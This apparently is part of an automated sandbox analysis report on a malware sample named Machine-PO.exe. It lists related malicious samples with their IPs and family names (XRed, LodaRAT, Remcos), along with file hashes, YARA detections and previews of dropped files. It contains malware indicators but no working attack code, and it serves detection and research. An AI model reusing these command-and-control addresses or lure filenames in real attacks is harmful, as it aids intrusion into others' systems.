| 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | malicious | Remcos | 104.243.246.120
| nabsh4.elf | malicious | Unknown | 46.243.206.70
| 7jBzTH9FXQ.exe | malicious | Unknown | 37.221.166.158
AWKNET-LLCUS | 222.exe | malicious | LodaRAT, XRed | 69.42.215.252
| Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed | 69.42.215.252
| zhuzhu.exe | malicious | GhostRat, XRed | 69.42.215.252
| Purchase Order No. G02873362-Docx.vbs | malicious | LodaRAT, XRed | 69.42.215.252
| blq.exe | malicious | Gh0stCringe, RunningRAT, XRed | 69.42.215.252
| New PO - Supplier 0202AW-PER2.exe | malicious | LodaRAT, XRed | 69.42.215.252
| RNEQTT.exe | malicious | LodaRAT, XRed | 69.42.215.252
| ZmrwoZsbPp.exe | malicious | XRed | 69.42.215.252
| ccmsetup.exe | malicious | XRed | 69.42.215.252
| Synaptics.exe | malicious | XRed | 69.42.215.252
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | 222.exe | malicious | LodaRAT, XRed | 172.217.16.193, 216.58.206.46
| Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed | 172.217.16.193, 216.58.206.46
| zhuzhu.exe | malicious | GhostRat, XRed | 172.217.16.193, 216.58.206.46
| setup.msi | malicious | Unknown | 172.217.16.193, 216.58.206.46
| Lets-x64.exe | malicious | Nitol, Zegost | 172.217.16.193, 216.58.206.46
| KL-3.1.16.exe | malicious | Nitol, Zegost | 172.217.16.193, 216.58.206.46
| Whyet-4.9.exe | malicious | Nitol, Zegost | 172.217.16.193, 216.58.206.46
| QQyisSetups64.exe | malicious | GhostRat | 172.217.16.193, 216.58.206.46
| wyySetups64.exe | malicious | GhostRat | 172.217.16.193, 216.58.206.46
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\ProgramData\Synaptics\RCX7868.tmp | 222.exe | malicious | LodaRAT, XRed |

Process: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 118
Entropy (8bit): 3.5700810731231707
Encrypted: false
SSDEEP: 3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
MD5: 573220372DA4ED487441611079B623CD
SHA1: 8F9D967AC6EF34640F1F0845214FBC6994C0CB80
SHA-256: BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
SHA-512: F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
Malicious: false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.1338274853507155
Encrypted: false
SSDEEP: 192:fjSVpsUIC0Xg3kDzJDzqjLOA/itzxwzuiFYZ24IO8EKDzy:yyU8Xg3kJqjMKzuiFYY4IO8zy
MD5: 4D98AA63383A22F3D831B1E3CB288CC8
SHA1: B0929BC7397EBD3A0251FC81AA9FBEDB02036DE4
SHA-256: A633D95A135A24A3350000F57D71D4DAD0CB6C705A8A12718E66CDD048D077FD
SHA-512: 280E3588C6F3B25E97ED80C03210E0AAC30D578E6805F0F1E1F187670E5E78860E830B9D6BCE858B0959870901C50F03A936463F93DF608893FC589572897E1B
Malicious: false
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.7.9.3.6.0.0.4.1.0.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.7.9.4.1.1.9.1.6.0.1.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.6.5.b.8.e.1.9.-.1.0.7.c.-.4.7.d.6.-.9.e.1.e.-.b.0.e.0.2.5.1.7.0.5.0.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.0.0.4.a.3.e.b.-.7.4.1.1.-.4.9.5.d.-.9.6.8.b.-.3.0.2.1.9.8.9.3.1.1.6.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.e.c.-.0.0.0.1.-.0.0.1.4.-.1.2.a.9.-.a.f.1.b.a.5.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.6.c.2.b.a.a.7.2.e.a.5.d.0.8.b.6.5.8.3.8.9.3.b.0.1.0.0.1.e.5.4.0.2.1.3.f.4.a.a.f.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Mon Dec 30 10:25:36 2024, 0x1205a4 type
Category: dropped
Size (bytes): 2476986
Entropy (8bit): 1.9191640579217115
Encrypted: false
SSDEEP: 6144:GV3CJmJlioqBdRmKMD1iCpbqCae+1nrnB0EW4:GVYCioqBd5MD1RqCaVLB
MD5: BCD2480299F11751269C8DE428630851
SHA1: 5662293E0DCE3E7133259B0255023D7D9B8655E5
SHA-256: F616C73F12F14B9ACBDAB643EE1814B0CACDF81BBA95A78E86935E43BC04F665
SHA-512: 88B1ED8BAC28A8F51526A2FE82EA5F617EC151EF0EC6E0AE94C984FE97B66BAB48FFF795962A82B0E6665A5E55928D1C58C099E490CDE1C18DF3C2D50F204C9A
Malicious: false
Preview: MDMP..a..... ....... urg............d...............x%......$... E.......P..X...........`.......8...........T.................$.........DE..........0G..............................................................................eJ.......G......GenuineIntel............T............urg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 6310
Entropy (8bit): 3.7131166473433757
Encrypted: false
SSDEEP: 96:RSIU6o7wVetbYxP6HOYirJ1sTBm75aMQUu89bPE9sfl9Sm:R6l7wVeJYxP6uYirJS4pDu89bs9sflkm
MD5: 35556BEACA0B616104E2C655080DB1A6
SHA1: 1B2A107C650ECFD1AA900F99868C9EBFE4279B47
SHA-256: 4DD91C822C09B2A20823663C85FF18A8C3FC41B4E2CB32007F85FF31BDBC6A63
SHA-512: A0C8F2134597EB23678B7CE4B1B525ED23D8E70C7A22FE2DACD7479BD79B8787CE7C420BB29308ABE933E8E32F8DFA7CCAFE8D497CF96295EF4DFEAF3E523451
Malicious: false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.9.2.<./.P.i.

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4580
Entropy (8bit): 4.438508193138511
Encrypted: false
SSDEEP: 48:cvIwWl8zs4zJg77aI9OhWpW8VYdYm8M4JFPFDz+q8Zsc5Zgd:uIjfWI7Iw7V1JrzhmZgd
MD5: B5941231E98B37925148245267BFE482
SHA1: 217B7AD7F7E264EE8E853CFDB8248B6497566B0D
SHA-256: B2A2B616C90DBFBDD1C188E9277B1D07B3E5C161366F89F7EA3FF1BFEA74822A
SHA-512: A72199105ACFCB5D22887E1FE8A25FC29054547A0FC64CAFB47C3E40A5B029E42FA7D331EBA41CF779F70FEDE2BFF83D84751629E894FCBD492B066625567894
Malicious: false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653848" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

Process: C:\Users\user\Desktop\Machine-PO.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: modified
Size (bytes): 771584
Entropy (8bit): 6.638013190381294
Encrypted: false
SSDEEP: 12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
MD5: ACA4D70521DE30563F4F2501D4D686A5
SHA1: 6C2BAA72EA5D08B6583893B01001E540213F4AAF
SHA-256: 449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
SHA-512: DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
Malicious: true
Yara Hits:
• Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX7868.tmp, Author: Joe Security
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX7868.tmp, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 92%
Joe Sandbox View:
• Filename: 222.exe, Detection: malicious
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

Process: C:\Users\user\Desktop\Machine-PO.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 2208256
Entropy (8bit): 7.058935933771513
Encrypted: false
SSDEEP: 49152:AnsHyjtk2MYC5GDokwkn9IMHeaXA0COysPklzMKGmPyaPCSO:Ansmtk2aCdnV/MOKpPCt
MD5: A6BD561711EA8C2064C20644CCEEE074
SHA1: CB330A1AD78387BDC401142FEECAC763AC63D3D9
SHA-256: E6F8EDCBE69419008B7E54F8554FC1AEC66208DE10C26A982D624EA91AED8092
SHA-512: 62D55F02D14D122B10A0EF08DFA5FFA950F4153863246E3F6E6A6BD1A4D1C63321C7C4E9FB4306C0535E73389D764CC0646C0821A62FD50A2896EC49F205490B
Malicious: true
Yara Hits:
• Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 92%
                                                                                                              Process:C:\Users\user\Desktop\Machine-PO.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):26
                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                              Malicious:true
                                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.239273504013797
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0O4IPzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+cIb+pAZewRDK4mW
                                                                                                              MD5:B59E096EA561CCE5D2A95750B0A96452
                                                                                                              SHA1:7245ED180CF7C8B227FE0DCBC61ADE4CF1562EFE
                                                                                                              SHA-256:910D011ECE260C744974B592AB2913B469DE12A0D034D1A30156A5C0F6160B64
                                                                                                              SHA-512:679D501B6786F86EC137A9F839CB7A92F4A8DFF48EBE33E4EC76056F2965E24932EC40DA9BD9D7DBDB314ADA87465D215B0B68B278D60F2878C5230B036EE30D
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nkVUp0rTVy8bh-f8doo2nw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.272852403692713
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0OSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+F+pAZewRDK4mW
                                                                                                              MD5:47A290F7F46F9D550E293D3F519D0798
                                                                                                              SHA1:EFC8A48CB57FA1E338B6F3767E8559F3642986F8
                                                                                                              SHA-256:6486C388DD014C899213FACE00398D1EC4E282BF03EC989AFE2801253C57A985
                                                                                                              SHA-512:9E9DE75FBADB8D14443BF30072AF162BAC5DBDDA9AE340E7B9A62599EABEC83A531E33AA1615825CBD700654B53A1B97500B521B0F878FE33D1F0105A1D7D792
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="R6LzWe5OJyDzdUBRCJhGlw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.2535117972801695
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0jSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+M+pAZewRDK4mW
                                                                                                              MD5:0667EBFFA347BB93035CA301190D09B6
                                                                                                              SHA1:111893B0CDD5DB692D2D01A16CDF508AB16FACE2
                                                                                                              SHA-256:613C5E077EC99A5DE45CAC9FC6CB546D695B7212985B8D347ABF8058016D8417
                                                                                                              SHA-512:F5C9FD7BE04949E9717A2D08945F60AC1452B37EF5FF487C776E5DA79CDDCB229B8EDC8214A468B10BCFC761BD0B9E299044ED930F3E6D6E359B36FEB7AB5058
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="a27Z9cLu1bqgrwleBCZMeQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.274516473581255
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0t3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+63+pAZewRDK4mW
                                                                                                              MD5:E74833DAABB6E4C1223BFD2C49859857
                                                                                                              SHA1:7CBE0B241D187721264216370D91828EF2A0758C
                                                                                                              SHA-256:DF52F0565FF4A8F3754A23E4FB3D267DFA08E0B57E8083ADBA83137EE774FD96
                                                                                                              SHA-512:A32E9C39199C4E289A77D2FE9C83D9174452E9C9EB5F0F9D0702B98517E2C7F17B61A2513CCE24BC265E5DB9341F16FF70D30825C635FA7DABBE55743F44644C
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="V6hp6sqOR8C0IfZPYQ1Otw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.267143712988719
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0smrSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+bm+pAZewRDK4mW
                                                                                                              MD5:442D8E9DFA6155ED3E48121DB7DD6A64
                                                                                                              SHA1:C0B7570E420B110F6452158FCFB0FCC26BF3FA2C
                                                                                                              SHA-256:D8010917B88B3B9DD4230132FFAFCFCC468F8EEAFD35499A2E342C835177FDD0
                                                                                                              SHA-512:178FD9D46F2E9B1F184408B41B75AC904C732611D6AFA4D1ACF4DBAF4EE85211A9DEB9C5FF7196B078EC2E9FCFEF4692EB504874892EA948AD98CA2471154310
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-wDL1r0BzKRDJr9u2pDHCA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:Microsoft Excel 2007+
                                                                                                              Category:dropped
                                                                                                              Size (bytes):18387
                                                                                                              Entropy (8bit):7.523057953697544
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                              MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                              SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                              SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                              SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                              Malicious:false
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.267723242448084
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+03ISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+gI+pAZewRDK4mW
                                                                                                              MD5:1AA5A3A7722CA0FC07C09833AEC79F53
                                                                                                              SHA1:B5BC9CE3A1AC019D7DBB426D810DB94274FB7C83
                                                                                                              SHA-256:0FD39C66B02C1FE2B16A4DAF45512D4813C30D435173491331052247D3C6DB6F
                                                                                                              SHA-512:2FFC8005B01013E9296104EC426694CE410854339E9F918130CD90A90B15BF679A138E1BC32D95DD0253511CE159171EAAA21EE435BBE5D9E80C4387885FC775
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_ol1Eu8GFqQOYQy8FYqKuw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.26978804655957
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0rSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+A+pAZewRDK4mW
                                                                                                              MD5:A456DAAFBE63727E6A602CD04BD05F05
                                                                                                              SHA1:89FA6A0888C628203EDCDD624FBD302274287455
                                                                                                              SHA-256:9E90CD9DBAA0850C493D4879C18B70415758B59AF44ADB55609CBEB1A26CECC6
                                                                                                              SHA-512:925CE1628631AB9DD9569D434C98D340A23019382A501068D03436BA590D81383FA8195EA4B5CA392E4EAE2B9A48204CC7D1B18DF7FE62CECE3BA6687228DA98
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Eav3Q0JfaBR5RJTv06AI5Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\Users\user\Desktop\._cache_Machine-PO.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:modified
                                                                                                              Size (bytes):846
                                                                                                              Entropy (8bit):5.348614386699207
                                                                                                              Encrypted:false
